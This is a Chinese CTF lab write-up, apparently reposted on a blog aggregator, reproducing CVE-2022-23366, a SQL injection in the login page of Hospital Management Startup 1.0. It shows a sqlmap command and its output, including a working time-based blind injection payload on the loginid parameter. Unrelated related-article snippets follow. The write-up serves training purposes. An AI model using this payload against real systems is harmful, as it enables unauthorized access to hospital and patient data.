Hospital Management Startup 1.0 SQL 注入漏洞(CVE-2022-23366)

news2024/11/13 15:17:50

前言

CVE-2022-23366是一个影响HMS v1.0的SQL注入漏洞。该漏洞存在于patientlogin.php文件中,允许攻击者通过特定的SQL注入来获取或修改数据库中的敏感信息。

具体来说,攻击者可以通过向patientlogin.php发送恶意构造的SQL语句来绕过身份验证,访问受保护的数据,甚至可能修改或删除数据库中的数据。此漏洞的CVSS v3评分为9.8,表明其严重性极高,因为无需认证就能被远程利用,且会导致高度的机密性、完整性和可用性影响​ (MITRE CVE)​​ (Tenable®)​。

该漏洞的详细信息和修复措施可以在Packet Storm Security和GitHub上找到。这些资源提供了更多技术细节和补救措施,建议用户尽快更新或修复受影响的系统。

春秋云镜靶场是一个专注于网络安全培训和实战演练的平台,旨在通过模拟真实的网络环境和攻击场景,提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点:

实战演练:

提供各种网络安全攻防演练场景,模拟真实的网络攻击事件,帮助用户在实际操作中掌握网络安全技术。
场景涵盖Web安全、系统安全、网络安全、社工攻击等多个领域。

漏洞复现:

用户可以通过平台对已知的安全漏洞进行复现,了解漏洞的产生原因、利用方法和修复措施。
通过实战操作,帮助用户掌握漏洞利用和防护的技能。

教学培训:

提供系统化的网络安全课程,从基础到高级,覆盖多个安全领域,适合不同水平的用户。
包含理论讲解和实战操作,帮助学员全面提升网络安全知识和实战能力。

竞赛与评测:

定期举办网络安全竞赛,如CTF(Capture The Flag)比赛,激发学员的学习兴趣和动力。
提供个人和团队的安全能力评测,帮助学员了解自己的安全技能水平。

资源共享:

平台提供丰富的学习资源,包括教程、工具、案例分析等,方便用户随时查阅和学习。
用户可以在社区中分享经验和资源,互相交流和学习。

春秋云镜靶场适合网络安全从业人员、学生以及对网络安全感兴趣的个人,通过在平台上进行不断的学习和实战演练,可以有效提升网络安全技能和防护能力。

介绍

Hospital Management Startup (HMS) v1.0 是一个用于医疗机构管理的软件系统,旨在简化和优化医院的日常运营和管理。以下是其主要功能和特点:

主要功能

  1. 患者管理

    • 提供详细的患者信息记录,包括基本信息、病历、治疗记录等。
    • 支持患者入院、出院和转院管理。
  2. 预约系统

    • 提供在线预约功能,患者可以方便地预约医生。
    • 医生可以查看和管理预约信息,安排日程。
  3. 医生管理

    • 记录和管理医生的详细信息,包括资格、专长和工作安排。
    • 支持医生的绩效评估和工作记录管理。
  4. 药品管理

    • 记录药品库存和使用情况,包括药品的采购、库存管理和分发。
    • 提供药品使用报告,帮助医院进行库存管理。
  5. 财务管理

    • 管理医院的财务收支,包括挂号费、治疗费和药品费等。
    • 提供财务报告和统计分析,帮助医院进行财务规划。
  6. 实验室管理

    • 管理实验室检验项目和结果,记录患者的检验报告。
    • 提供检验数据分析,辅助医生诊断和治疗。
  7. 病房管理

    • 管理病房信息,包括病房分配、使用情况和维护记录。
    • 实时监控病房状态,优化资源配置。

优势

  • 提高管理效率:通过信息化管理,减少人工操作,提高工作效率和准确性。
  • 优化患者体验:提供便捷的预约和就诊服务,提升患者满意度。
  • 数据安全:通过权限管理和数据加密,确保患者信息和医院数据的安全。
  • 支持决策分析:提供详细的统计分析和报告,辅助医院管理层进行决策。

应用场景

  • 综合医院:适用于大中型综合医院,提升医院的管理效率和服务质量。
  • 专科医院:适用于专科医院,根据需要定制功能,专注特定领域的管理。
  • 诊所和门诊部:适用于小型医疗机构,提高日常运营的效率。

总结

Hospital Management Startup (HMS) v1.0 是一款全面的医疗管理软件,致力于通过信息化手段优化医院的管理流程,提升工作效率和服务质量。它适用于各种类型和规模的医疗机构,是现代医院管理的理想选择。

漏洞复现

打开靶场

网上搜索了一下关于这个 CVE 的详细信息 

进入靶场后页面长这样

在导航栏 LOG IN 中发现下拉导航栏有与目标漏洞文件关联的选项 

随便输入数值,登录时使用 BurpSuite 开启拦截数据包

复制数据包的值到 txt 文件中 

使用 SQLMap 开跑

D:\CVE\sqlmap-master>python sqlmap.py -r sqlmap-post.txt -D “ctf” -T "flag" -C "flag" --dump
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.6.17#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 23:12:45 /2024-07-03/

[23:12:45] [INFO] parsing HTTP request from 'sqlmap-post.txt'
[23:12:45] [INFO] resuming back-end DBMS 'mysql'
[23:12:45] [INFO] testing connection to the target URL
[23:12:47] [WARNING] the web server responded with an HTTP error code (502) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: loginid (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: loginid=admin' AND (SELECT 6249 FROM (SELECT(SLEEP(5)))gTyH) AND 'YjsK'='YjsK&password=123456&submit=Login
---
[23:12:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[23:12:47] [INFO] fetching entries of column(s) 'flag' for table 'flag' in database 'ctf'
[23:12:47] [INFO] fetching number of column(s) 'flag' entries for table 'flag' in database 'ctf'
[23:12:47] [INFO] resumed: 1
[23:12:47] [INFO] resumed: flag{a17af7eb-5fd8-4069-bb42-7335ed8c6b97
Database: ctf
Table: flag
[1 entry]
+-------------------------------------------+
| flag                                      |
+-------------------------------------------+
| flag{a17af7eb-5fd8-4069-bb42-7335ed8c6b97}|
+-------------------------------------------+

[23:12:47] [INFO] table 'ctf.flag' dumped to CSV file 'C:\Users\ydd33\AppData\Local\sqlmap\output\eci-2zeaey91a1p0r8n85s0e.cloudeci1.ichunqiu.com\dump\ctf\flag.csv'
[23:12:47] [WARNING] HTTP error codes detected during run:
502 (Bad Gateway) - 1 times
[23:12:47] [INFO] fetched data logged to text files under 'C:\Users\ydd33\AppData\Local\sqlmap\output\eci-2zeaey91a1p0r8n85s0e.cloudeci1.ichunqiu.com'

[*] ending @ 23:12:47 /2024-07-03/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1911467.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

LabVIEW开发阀门自动校准装置

1. 装置概述与目标 在工业和实验室环境中,阀门的准确性和稳定性对于流体控制和实验数据的可靠性非常重要。LabVIEW可以作为开发阀门自动校准装置的理想工具,提供高度可定制化的解决方案。 2. 硬件与设备选择 型号选择:为了实现阀门自动校准…

三维点云配准 -- ICP 算法原理及推导

三维点云配准 -- ICP 算法原理及推导 - 知乎 (zhihu.com) 三维点云配准 -- ICP 算法 | Yilins Blog Alex Segal - Research - Generalized-ICP (ox.ac.uk)

Redisson分布式锁、可重入锁

介绍Redisson 什么是 Redisson?来自于官网上的描述内容如下! Redisson 是一个在 Redis 的基础上实现的 Java 驻内存数据网格客户端(In-Memory Data Grid)。它不仅提供了一系列的 redis 常用数据结构命令服务,还提供了…

线程池案例

秒杀 需求 10个礼物20个客户抢随机10个客户获取礼物&#xff0c;另外10无法获取礼物 任务类 记得给共享资源加锁 public class MyTask implements Runnable{// 礼物列表private ArrayList<String> gifts ;// 用户名private String username;public MyTask( String user…

第十八节 LLaVA如何按需构建LORA训练(视觉、语言、映射多个组合训练)

文章目录 前言一、基于llava源码构建新的参数1、添加lora_vit参数2、训练命令脚本设置二、修改源码,构建lora训练1、修改源码-lora训练2、LLM模型lora加载3、VIT模型加载4、权重冻结操作5、结果显示三、实验结果前言 如果看了我前面文章,想必你基本对整个代码有了更深认识。…

技术速递|VS Code Java 6月更新 - 项目设置功能增强!大量 Spring 新特性

作者&#xff1a;Nick Zhu 排版&#xff1a;Alan Wang 大家好&#xff0c;欢迎阅读 Visual Studio Code for Java 的六月更新&#xff01;在这篇博客中&#xff0c;我们将分享项目设置项目的重要更新以及一系列 Spring 的功能改进&#xff0c;让我们开始吧&#xff01; 项目设…

gitlab-runner安装部署CI/CD

手动安装 卸载旧版&#xff1a; gitlab-runner --version gitlab-runner stop yum remove gitlab-runner下载gitlab对应版本的runner # https://docs.gitlab.com/runner/install/bleeding-edge.html#download-any-other-tagged-releasecurl -L --output /usr/bin/gitlab-run…

工业一体机为数字化工厂带来高效作业指导

随着工业4.0的浪潮席卷全球&#xff0c;数字化工厂的概念深入人心。在这一背景下&#xff0c;工业一体机作为数字化转型的重要一环&#xff0c;凭借其强大的功能和灵活的应用&#xff0c;为工厂实现高效作业指导提供了强大的助力。 一、工业一体机的优势&#xff1a;赋能数字化…

解锁算力新极限,Xilinx UltraScale+赋能的高性能低延时FPGA加速卡

01、产品概述 AiHPC-V9P 是一款基于 AMD Virtex UltraScale FPGA VU9P 的 PCIe Gen3.0 x16 接口智能网卡&#xff0c;具有最大2*200GbE /或者16*10GbE(典型应用&#xff09;接入容量的高性能低延时智能网卡。 对外接口支持两组QSFP-DD 最高25Gb/s x8Lane 光口接入&#xf…

机场公厕厕位指引屏,布线简单,安装便捷

在人潮涌动的机场&#xff0c;公厕不仅是旅客的必需设施&#xff0c;更是衡量机场服务质量的重要指标。然而&#xff0c;传统机场公厕往往存在信息不透明、清洁维护滞后、高峰期拥挤等问题&#xff0c;严重影响了旅客的使用体验。近年来&#xff0c;随着智慧机场理念的兴起&…

【第24章】MyBatis-Plus之SQL注入器

文章目录 前言一、概述1. 使用场景2. 功能 二、注入器配置三、自定义全局方法攻略1. 定义SQL2. 注册自定义方法3.定义BaseMapper4.配置SqlInjector 四、注意事项五、更多示例六、实战1. 定义SQL2. 注册自定义方法3.定义BaseMapper4.配置SqlInjector5. 测试类6. 结果 总结 前言 …

如何使用IDEA快速清理无效代码(荣耀典藏版)

大家好&#xff0c;我是月夜枫。 今天分享一下IDEA中很有实用价值的Analyze&#xff0c;那么Analyze是用来做什么的呢&#xff1f; 主要用来清理没有引用的代码&#xff0c;包括方法、实体类以及没有使用的Mapper和Service等。 为了是项目更加整洁&#xff0c;可以使用Idea中…

(十六)视图变换 正交投影 透视投影

视图变换 代码实验 #include <glad/glad.h>//glad必须在glfw头文件之前包含 #include <GLFW/glfw3.h> #include <iostream> #define STB_IMAGE_IMPLEMENTATION #include "stb_image.h"//GLM #include <glm/glm.hpp> #include <glm/gtc/m…

SECS/GEM快速完成半导体设备通讯

金南瓜帮助国内大量从事半导体前道设备开发研制、生产的设备厂商&#xff0c;通过快速提供稳定可靠的SECS/GEM、GEM300产品&#xff0c;为客户在激光退火、湿法设备&#xff08;清洗、镀膜等&#xff09;、离子注入、MOCVD、PVD等客户专注于核心工艺提升&#xff0c;提升企业的…

【Python进阶】继承进阶和私有权限

目录 一、继承进阶 1、方法重写 2、调用父类方法 3、多层继承 二、私有权限 1、私有属性 2、私有方法 面向对象基础&#xff1a;小白也能看懂的Python基础教程&#xff08;8&#xff09;-CSDN博客 一、继承进阶 1、方法重写 当父类的同名方法达不到子类的要求&#x…

AR增强现实汽车装配仿真培训系统开发降低投入费用

随着互联网的无处不在&#xff0c;AR增强现实技术正逐步融入我们生活的每一个角落。深圳华锐视点作为一家引领行业潮流的AR内容开发的技术型公司&#xff0c;正以其卓越的技术实力和专业的服务团队&#xff0c;推动着国内AR技术向更加成熟和多元化的方向迈进。 深圳华锐视点提供…

2024年文化研究与数字媒体国际会议 (CRDM 2024)

2024年文化研究与数字媒体国际会议 (CRDM 2024) 2024 International Conference on Cultural Research and Digital Media 【重要信息】 大会地点&#xff1a;珠海 大会官网&#xff1a;http://www.iccrdm.com 投稿邮箱&#xff1a;iccrdmsub-conf.com 【注意&#xff1a;稿将…

深入探索联邦学习框架 Flower

联邦学习框架 本文主要期望介绍一个设计良好的联邦学习框架 Flower&#xff0c;在开始介绍 Flower 框架的细节前&#xff0c;先了解下联邦学习框架的基础知识。 作为一个联邦学习框架&#xff0c;必然会包含对横向联邦学习的支持。横向联邦是指拥有类似数据的多方可以在不泄露…

【算法】代码随想录之数组(更新中)

文章目录 前言 一、二分查找法&#xff08;LeetCode--704&#xff09; 二、移除元素&#xff08;LeetCode--27&#xff09; 前言 跟随代码随想录&#xff0c;学习数组相关的算法题目&#xff0c;记录学习过程中的tips。 一、二分查找法&#xff08;LeetCode--704&#xff0…

【环境准备】 Vue环境搭建

文章目录 前言vue-cli 安装创建项目3.0、以下3.0 、以上 前言 书接上回《NodeJs(压缩包版本)安装与配置》&#xff0c;安装完了NodeJs&#xff0c;接下来就要配置vue的环境了。 vue-cli 安装 安装vue-cli输入如下命令 #&#xff08;安装的是最新版&#xff09; npm install …